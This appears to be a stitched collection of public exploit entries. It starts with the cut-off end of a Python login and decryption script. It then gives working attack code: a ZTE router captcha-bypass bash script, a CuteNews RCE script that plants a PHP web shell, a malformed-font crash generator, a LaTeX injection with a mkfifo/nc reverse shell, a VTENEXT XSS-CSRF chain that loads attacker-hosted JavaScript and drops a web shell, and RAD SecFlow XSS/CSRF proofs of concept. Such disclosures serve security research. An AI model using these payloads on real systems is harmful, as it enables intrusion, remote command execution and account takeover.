'USER', 'LOGON', base64.b64encode(uname).decode(), base64.b64encode(pw).decode(), '', str(mode), 'UTF-8', '805306367', '1']) resp = self.recv_msg() if resp[4:6] != ['LOGONFAILED', '3']: print(resp) raise Exception('unrecognized login response') crypt_key = base64.b64decode(resp[8]) return crypt_key def login_with_key(self, uname, pw, crypt_key): self.reconnect() hashed_uname = base64.b64encode(hashlib.md5(uname.lower()+crypt_key).digest()) hashed_pw = base64.b64encode(hashlib.md5(pw+crypt_key).digest()) self.send_msg(['IP', 'USER', 'LOGON', hashed_uname.decode(), hashed_pw.decode(), '', '1', 'UTF-8', '1', '1']) resp = self.recv_msg() if resp[4] == 'LOGONFAILED': return False self.msg_queue = [resp] + self.msg_queue return True def login(self, uname, pw): crypt_key = self.get_crypt_key(1, uname, pw) if not self.login_with_key(uname, pw, crypt_key): return False return crypt_key ### ### lib/crypt.py ### pat = b'abcdefghijklmnopqrstuvwxyz0123456789' def td_asctonum(code): if code in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ': code += 0x20 if code not in pat: return None return pat.index(code) def td_numtoasc(code): if code < 36: return pat[code] return None gword = [ b'SjiW8JO7mH65awR3B4kTZeU90N1szIMrF2PC', b'04A1EF7rCH3fYl9UngKRcObJD6ve8W5jdTta', b'brU5XqY02ZcA3ygE6lf74BIG9LF8PzOHmTaC', b'2I1vF5NMYd0L68aQrp7gTwc4RP9kniJyfuCH', b'136HjBIPWzXCY9VMQa7JRiT4kKv2FGS5s8Lt', b'Hwrhs0Y1Ic3Eq25a6t8Z7TQXVMgdePuxCNzJ', b'WAmkt3RCZM829P4g1hanBluw6eVGSf7E05oX', b'dMxreKZ35tRQg8E02UNTaoI76wGSvVh9Wmc1', b'i20mzKraY74A6qR9QM8H3ecUkBlpJC1nyFSZ', b'XCAUP6H37toQWSgsNanf0j21VKu9T4EqyGd5', b'dFZPb9B6z1TavMUmXQHk7x402oEhKJD58pyG', b'rg8V3snTAX6xjuoCYf519BzWRtcMl2OiZNeI', b'dZe620lr8JW4iFhNj3K1x59Una7PXsLGvSmB', b'5yaQlGSArNzek6MXZ1BPOE3xV470h9KvgYmb', b'f12CVxeQ56YWd7OTXDtlnPqugjJikELayvMs', b'9Qoa5XkM6iIrR7u8tNZgSpbdDUWvwH21Kyzh', b'AqGWke65Y2ufVgljEhMHJL01D8Zptvcw7CxX', b't960P2inR8qEVmAUsDZIpH5wzSXJ43ob1kGW', b'4l6SAi2KhveRHVN5JGcmx9jOC3afB7wF0ITq', b'tEOp6Xo87QzPbn24J3i9FjWKS1lIBVaMZeHU', b'zx27DH915lhs04aMJOgf6Z3pyERrGndiLwIe', b'8XxOBzZ02hUWDQfvL471q9RC6sAaJVFuTMdG', b'jON0i4C6Z3K97DkbqSypH8lRmx5o2eIwXas1', b'OIGT0ubwH1x6hCvEgBn274A5Q8K9e3YyzWlm', b'zgejY41CLwRNabovBUP2Aql7FVM8uEDXZQ0c', b'Z2MpQE91gdRLYJ8bGIWyOfc4v03Hjzs6VlU5', b't6PuvrBXeoHk5FJW08DYQSI49GCwZ27cA1UK', b'FiBA53IMW97kYNz82GhHf1yUCdL0nlvRD46s', b'2Vz3b06h54jmc7a8AIYtNHM1iQU9wBXWyJkR', b'wyI42azocV3UOX6fk579hMH8eEGJsgFuBmqb', b'TxmnK4ljJ9iroY8vVtg3Rae2L516fBWUuXAS', b'z6Y1bPrJEln0uWeLKkjo9IZ2y7ROcFHqBm54', b'x064LFB39TsXeryqvt2pZN8QIERuWAVUmwjJ', b'76qg85yB31uH90YbZofsjKrRGiTVndAEtFMx', b'WjwTEbCA752kq89shcaLB1xO64rgMYnoFiJQ', b'u6307O4J2DeZs8UYyjlzfX91KGmavEdwTRSg' ] def td_decrypt(data, key): kdx = 0 ret = [] for idx, code in enumerate(data): while True: if kdx >= len(key): kdx = 0 kcode = key[kdx] knum = td_asctonum(kcode) if knum is None: kdx += 1 continue break if code not in gword[knum]: return None cpos = gword[knum].index(code) ret.append(td_numtoasc(cpos)) kdx += 1 return bytes(ret) if __name__ == '__main__': main()

# Exploit Title: ZTE Router F602W - Captcha Bypass # Exploit Author: Hritik Vijay (@MrHritik) # Vendor Homepage: https://zte.com.cn # Reported: 2019-06-14 # Version: F6x2W V6.0.10P2T2 # Version: F6x2W V6.0.10P2T5 # Tested on: F602W # CVE: CVE-2020-6862 Background ----------- Captcha is used to make sure the form is being filled by a real person than an automated script. This is a very popular safety measure and bypassing it could lead to potential compromise. Introduction ------------ While logging in to the affected device you are presented with a username, password and captcha field. Submitting the form results in an HTTP request being sent out to /checkValidateCode.gch to validate the captcha, if valid it goes on to really submit the login request. This can be easily bypassed as this is a client side verification. One can always ignore the response and proceed to forcefully submit the form via Javascript (via calling the subpageSubmit() method). A typical login request looks like this: POST / HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/ Content-Type: application/x-www-form-urlencoded Content-Length: 101 Connection: close Cookie: _TESTCOOKIESUPPORT=1 Upgrade-Insecure-Requests: 1 frashnum=&action=login&Frm_Logintoken=2&Username=admin&Password=admin&Validatecode=literally_anything Though, firing the same request twice fails with a text on the top saying "Error". This pretty much defeats our purpose. It turns out that on every login attempt, the parameter Frm_Logintoken gets incremented by one and is required to match the server side value. This can pretty easily be achieved by some pattern matching. Thus allowing any script to bypass the captcha and log in. Threat ------- A captcha bypass can really help in bruteforcing the credentials but luckily the router limits the login trials to 3 attempts. In real world though, things are a bit different. The affected ZTE router comes with a default password. Given that the devices on a same ISP network can access each other, it would be a matter of time before someone writes a script to log in to every router in the network and take control of it. PoC ------- #!/bin/bash SERVER=192.168.1.1 USER="admin" PASS="admin" getToken(){ curl -s --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER | grep 'Frm_Logintoken")' | cut -d\" -f4 } Frm_Logintoken=`getToken` s=$(curl -sv --data "frashnum=&action=login&Frm_Logintoken=$Frm_Logintoken&Username=$USER&Password=$PASS" --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER -w "%{http_code}" -o /dev/null 2> /tmp/zte_cookie) if [[ $s -eq 302 ]]; then echo "Logged in" echo "Open http://$SERVER/start.ghtml" echo `grep -o Set-Cookie.* /tmp/zte_cookie` else echo "Failed" fi

# Exploit Title: CuteNews 2.1.2 - Remote Code Execution # Google Dork: N/A # Date: 2020-09-10 # Exploit Author: Musyoka Ian # Vendor Homepage: https://cutephp.com/cutenews/downloading.php # Software Link: https://cutephp.com/cutenews/downloading.php # Version: CuteNews 2.1.2 # Tested on: Ubuntu 20.04, CuteNews 2.1.2 # CVE : CVE-2019-11447 #! /bin/env python3 import requests from base64 import b64decode import io import re import string import random import sys banner = """ _____ __ _ __ ___ ___ ___ / ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ | / /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/ \___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/ ___ _________ / _ \/ ___/ __/ / , _/ /__/ _/ /_/|_|\___/___/ """ print (banner) print ("[->] Usage python3 expoit.py") print () sess = requests.session() payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>" ip = input("Enter the URL> ") def extract_credentials(): global sess, ip url = f"{ip}/CuteNews/cdata/users/lines" encoded_creds = sess.get(url).text buff = io.StringIO(encoded_creds) chash = buff.readlines() if "Not Found" in encoded_creds: print ("[-] No hashes were found skipping!!!") return else: for line in chash: if "<?php die('Direct call - access denied'); ?>" not in line: credentials = b64decode(line) try: sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1) print (sha_hash) except: pass def register(): global sess, ip userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10)) postdata = { "action" : "register", "regusername" : userpass, "regnickname" : userpass, "regpassword" : userpass, "confirm" : userpass, "regemail" : f"{userpass}@hack.me" } register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False) if 302 == register.status_code: print (f"[+] Registration successful with username: {userpass} and password: {userpass}") else: sys.exit() def send_payload(payload): global ip token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text signature_key = re.search('signature_key" value="(.*?)"', token).group(1) signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1) logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1) print (f"signature_key: {signature_key}") print (f"signature_dsi: {signature_dsi}") print (f"logged in user: {logged_user}") files = { "mod" : (None, "main"), "opt" : (None, "personal"), "__signature_key" : (None, f"{signature_key}"), "__signature_dsi" : (None, f"{signature_dsi}"), "editpassword" : (None, ""), "confirmpassword" : (None, ""), "editnickname" : (None, logged_user), "avatar_file" : (f"{logged_user}.php", payload), "more[site]" : (None, ""), "more[about]" : (None, "") } payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text print("============================\nDropping to a SHELL\n============================") while True: print () command = input("command > ") postdata = {"cmd" : command} output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata) if 404 == output.status_code: print ("sorry i can't find your webshell try running the exploit again") sys.exit() else: output = re.sub("GIF8;", "", output.text) print (output.strip()) if __name__ == "__main__": print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================") extract_credentials() print ("================================================================") print() print ("=============================\nRegistering a users\n=============================") register() print() print("=======================================================\nSending Payload\n=======================================================") send_payload(payload) print ()

#!/usr/bin/env python3 # Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption # Date: 2020-09-10 # Exploit Author: Cody Winkler # Vendor Homepage: gnome.org # Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html # Version: 3.34.0 # Tested On: Ubuntu 20.04.1 LTS # # Note: May take a few tries. Too many consecutive runs can freeze OS. # This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped. from os import system this_pattern = "BEEF"*21125 # needs to be filled to len ~84500 # TTF file header (probably has some junk data in it) taken from MesloLGS NF Regular.ttf ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54" "\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45" "\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f" "\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55" "\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f" "\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45" "\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61" "\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74" "\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67" "\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73" "\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79" "\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61" "\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65" "\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74" "\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63" "\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78" "\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d" "\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73" "\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65" "\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00" "\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08" "\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14" "\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a") print('[+] Generating crash.ttf with DEADDEAD') with open("./crash.ttf", 'w') as f: f.write(ttf_header) f.write(this_pattern) f.close() print('[+] Done') print('[+] Triggering out-of-bounds write in gnome-font-viewer') system("/usr/bin/gnome-font-viewer ./crash.ttf")

# Exploit Title: Tea LaTex 1.0 - Remote Code Execution (Unauthenticated) # Google Dork: N/A # Date: 2020-09-01 # Exploit Author: nepska # Vendor Homepage: https://github.com/ammarfaizi2/latex.teainside.org # Software Link: https://github.com/ammarfaizi2/latex.teainside.org # Version: v1.0 # Tested on: Kali linux / Windows 10 # CVE: N/A # Header Requests POST /api.php?action=tex2png HTTP/1.1 Host: latex.teainside.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: text/plain;charset=UTF-8 Content-Length: 64 Origin: https://latex.teainside.org DNT: 1 Connection: keep-alive Referer: https://latex.teainside.org/ Cookie: __cfduid=d7e499dd5e2cf708117e613f7286aa2021599260403 {"content":"\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}","d":200,"border":"50x20","bcolor":"white"} # Payload \documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document} # Attacker nc -lvp 1234

#!/usr/bin/python3 # Exploit Title: VTENEXT 19 CE - Remote Code Execution # Google Dork: n/a # Date: 2020/09/09 # Exploit Author: Marco Ruela # Vendor Homepage: https://www.vtenext.com/en/ # Software Link: Vendor removed vulnerable version from sourceforge.net # Version: 19 CE # Tested on: Ubuntu 16.04 # CVE : N/A # 2020/03/07 - Disclosed vulnerabilities to vendor # 2020/03/10 - Vendor committed to fix # 2020/09/09 - Public disclosure # This script should be easy enough to follow. # We string together the three vulnerabilities to get RCE. # XSS - The "From" field of the VTENEXT Messages module is vulnerable. # File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default . # CSRF - No CSRF protections in place. # exploit.js needs to be hosted somewhere, IP's need to be replaced # check_csrf() should be changed based on your setup # run_shell() is a "nice to have" # content of exploit.js """ function insertImage() { var xhr = new XMLHttpRequest(); xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true); xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt'); xhr.setRequestHeader('Content-Length', '248'); xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php'); xhr.withCredentials = true; var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--'; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } insertImage(); """ import smtplib import datetime import requests import os import time base_url = "http://192.168.226.168/vtenext19ce/" print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC") def build_url(): d = datetime.datetime.today() year = str(d.year) month = str(d.strftime("%B")) week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1]) tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/" return(tmp) def build_mail(): _from = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'""" _to = "[email protected]" _subject = "Important!" _body = "While you're reading this, a file is being uploaded to this server." msg = "From: " + _from + "\n" msg += "To: " + _to + "\n" msg += "Subject: " + _subject + "\n\n" msg += _body return msg def send_mail(): msg = build_mail() smtp_server = '192.168.226.167' smtp_port = 25 sender = '[email protected]' receiver = '[email protected]' server = smtplib.SMTP(smtp_server, smtp_port) server.sendmail(sender, receiver, msg) def check_csrf(): while True: is_there = os.popen('tail -n1 /var/log/apache2/access.log').read() if "200" in is_there and "/exploit.js" in is_there and base_url in is_there: print("[>] CSRF triggered") break else: time.sleep(0.5) continue def find_shell(): print("[>] Locating shell") time.sleep(1) tmp1 = build_url() for i in range(1, 9999): url = tmp1 + str(i) + "_shell.pht" r = requests.get(url) if r.status_code == 200: print("[>] Found the shell") print("[-] Location: " + url) return url else: continue def run_shell(x): print("\n") while True: cmd = input("shell> ") if cmd == "exit": break else: url = x + "?x=" + cmd r = requests.get(url) print(r.text) print("[>] Sending email") send_mail() print("[-] Waiting for user to open mail") check_csrf() shell_location = find_shell() run_shell(shell_location) print("[!] Done!")

# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting # Date: 2020-08-31 # Exploit Author: Jonatan Schor and Uriel Yochpaz # Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway # Version: SecFlow-1v os-image SF_0290_2.3.01.26 # Tested on: RAD SecFlow-1v # CVE : N/A A Stored-XSS vulnerability was found in multiple pages in the web-based management interface of RAD SecFlow-1v. An attacker could exploit this vulnerability by uploading a malicious file as the OVPN file in Configuration-Services-Security-OpenVPN-Config or as the static key file in Configuration-Services-Security-OpenVPN-Static Keys. These files content is presented to users while executing malicious stored JavaScript code. This could be exploited in conjunction with CVE-2020-13259 # Proof of Concept Upload a file containing the following JS code: <img src=x onerror=alert(1)> Refresh the page and observe the malicious JS code execute every time you browse the compromised page. # Full Account Takeover As mentioned above, this exploit could be used in conjunction with CVE-2020-13259 (CSRF), by using the CSRF exploit to upload a malicious file to a Stored-XSS vulnerabale page, which could allow Full Account Takeover. For further information and full PoC: https://github.com/UrielYochpaz/CVE-2020-13259 # Timeline May 19th, 2020 - Vulnerability exposed. May 19th, 2020 – Vulnerability reported to RAD. May 21th, 2020 – Vulnerability reported to MITRE. May 21th, 2020 – MITRE assigned CVE: CVE-2020-13260. May 22th, 2020 – Contacted RAD for further details and cooperation. Aug 25th, 2020 – RAD patched the vulnerability.

# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot) # Date: 2020-08-31 # Exploit Author: Uriel Yochpaz and Jonatan Schor # Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway # Version: SecFlow-1v os-image SF_0290_2.3.01.26 # Tested on: RAD SecFlow-1v # CVE : N/A A vulnerability in the web-based management interface of RAD SecFlow-1v could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. This could be exploited in conjunction with CVE-2020-13260. # Proof of Concept By persuading an authenticated user to open a web page containing the following code: <img src="https://SecFlow-1v_IP/devicereboot.php?restart=1&isSubmitted=1"> A reboot operation would begin. This attack could execute any operation available at the web-based management interface (File uploads, Scheduled and immediate reboots, Factory reset etc.) # Full Account Takeover As mentioned above, this exploit could be used in conjunction with CVE-2020-13260 (Stored-XSS), by using the CSRF exploit to upload a malicious file to a Stored-XSS vulnerabale page, which could allow Full Account Takeover. For further information and full PoC: https://github.com/UrielYochpaz/CVE-2020-13259 # Timeline May 19th, 2020 - Vulnerability exposed. May 19th, 2020 – Vulnerability reported to RAD. May 21th, 2020 – Vulnerability reported to MITRE. May 21th, 2020 – MITRE assigned CVE: CVE-2020-13259. May 22th, 2020 – Contacted RAD for further details and cooperation. Aug 25th, 2020 – RAD patched the vulnerability.